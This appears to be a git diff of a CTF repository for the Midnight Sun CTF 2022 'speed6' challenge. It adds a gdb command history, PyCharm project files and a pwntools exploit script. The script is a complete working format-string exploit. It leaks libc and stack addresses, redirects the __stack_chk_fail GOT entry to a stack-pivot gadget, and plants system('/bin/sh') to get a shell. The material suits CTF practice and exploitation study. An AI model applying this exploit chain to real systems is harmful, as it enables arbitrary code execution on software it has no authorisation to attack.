update

glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.gdb_history

+c
+c
+c
+vmmap
+checksec
+c
+stack 50
+x/20gx 0xfff17c64-0x94
+ni
+c
+stack 60
+p/x 37
+ni
+stack 60
+c
+ni
+stack 60
+c
+c
+stack 60
+c
+c
+c
+c
+stack 60
+c
+c
+c
+stack 60
+c
+c
+c
+c
+c
+stack 60
+c
+stack 70
+c
+c
+stack 70
+c
+c
+p/x 85
+q
+c
+stack 30
+q
+c
+stack 100
+ni
+stack 100
+p/x 37
+stack 100
+p/x 85
+p/x 0xffa7fc24-0x94
+c
+ni
+c
+q
+c
+c
+q
+c
+canary
+canary 
+stack 30
+tls
+q
+c
+c
+ni
+telescope 0xff983b18-0xc
+q
+q
+c
+got
+x/gx 0804c01c
+telescope 0x0804c01c
+q
+c
+got
+telescope 0x0804c01c
+q
+c
+c
+ni
+stack 70
+p/x 85
+stack 70
+q
+c
+stack 30
+telescope 0xffdb6bd0 50
+p/x 0xffdb6bdc+0xc-0xffdb6bd0
+p/x 0xffdb6bdc+0x3c-0xffdb6bd0
+q
+c
+k
+x/gx 0xffac0890+0x48
+p/x 0xfface370-0xc
+q
+c
+q
+c
+got
+telescope 0x0804c01c
+q
+c
+c
+stack 30
+ni
+stack 30
+p/x 0xffdf49e8-0xffdf49a0
+p/x 0x48*4
+p/x 0x48-0x3c
+p/x (0x48-0x3c)+0x100
+p/x (0x48-0x3c)+0x100
+p/x 0x100-0xc
+p/x0x10c/4
+q
+c
+ni
+c
+q

glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/.gitignore

+# 默认忽略的文件
+/shelf/
+/workspace.xml

glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/inspectionProfiles/profiles_settings.xml

+<component name="InspectionProjectProfileManager">
+  <settings>
+    <option name="USE_PROJECT_PROFILE" value="false" />
+    <version value="1.0" />
+  </settings>
+</component>
\ No newline at end of file

glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/misc.xml

+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectRootManager" version="2" project-jdk-name="Python 2.7" project-jdk-type="Python SDK" />
+</project>
\ No newline at end of file

glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/modules.xml

+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/speed6_f281.iml" filepath="$PROJECT_DIR$/.idea/speed6_f281.iml" />
+    </modules>
+  </component>
+</project>
\ No newline at end of file

glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/speed6_f281.iml

+<?xml version="1.0" encoding="UTF-8"?>
+<module type="PYTHON_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$" />
+    <orderEntry type="jdk" jdkName="Python 2.7" jdkType="Python SDK" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>
\ No newline at end of file

glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/.idea/vcs.xml

+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="VcsDirectoryMappings">
+    <mapping directory="$PROJECT_DIR$/../../.." vcs="Git" />
+  </component>
+</project>
\ No newline at end of file

glibc_pwn/2022MidnightSunCTF_speed6/speed6_f281/exp.py

+from pwn import *
+
+elf = ELF("./speed6")
+libc = ELF("./libc.so.6")
+context(arch=elf.arch, os=elf.os)
+# context.log_level = 'debug'
+p = process([elf.path])
+
+n16 = lambda x: (x + 0x10000) & 0xFFFF
+
+p.sendlineafter("f5b: ", "%2$p||%37$p")
+p.recvuntil("0x")
+libc.address = int(p.recvuntil("||", drop=True), 16) - libc.sym['_IO_2_1_stdin_']
+log.success("libc base: " + hex(libc.address))
+stack_addr = int(p.recvuntil("\n", drop=True), 16) - 0x55 * 4
+log.success("stack: " + hex(stack_addr))
+
+
+def arbitrary_offset_write(offset, value):
+    assert (stack_addr & 0xFFFF) + offset < (1 << 16) and value < (1 << 16)
+    p.sendlineafter('f5b: ', '%{}c%37$hn'.format((stack_addr + offset) & 0xFFFF))
+    p.sendlineafter('f5b: ', '%{}c%85$hn'.format(value))
+
+
+def arbitrary_address_write(address, value):
+    assert address < (1 << 32) and value < (1 << 16)
+    arbitrary_offset_write(0x30 * 4, address & 0xFFFF)
+    arbitrary_offset_write((0x30 * 4 + 2) & 0xFFFF, address >> 16)
+    p.sendlineafter('f5b: ', '%{}c%48$hn'.format(value & 0xFFFF))
+
+
+add_esp_ret = libc.search(asm('add esp, 0x100; sub eax, edx; ret;'), executable=True).next()
+arbitrary_address_write(elf.got['__stack_chk_fail'], add_esp_ret & 0xFFFF)
+arbitrary_address_write(elf.got['__stack_chk_fail'] + 2, add_esp_ret >> 16)
+
+system_addr = libc.sym['system']
+bin_sh_addr = libc.search('/bin/sh').next()
+arbitrary_offset_write(0x43 * 4, system_addr & 0xFFFF)
+arbitrary_offset_write(0x43 * 4 + 2, system_addr >> 16)
+arbitrary_offset_write(0x45 * 4, bin_sh_addr & 0xFFFF)
+arbitrary_offset_write(0x45 * 4 + 2, bin_sh_addr >> 16)
+
+# gdb.attach(p, 'b *{}'.format(hex(add_esp_ret)))
+# pause()
+arbitrary_offset_write(0x1c, 0x1)  # change canary to call the __stack_chk_fail
+
+p.interactive()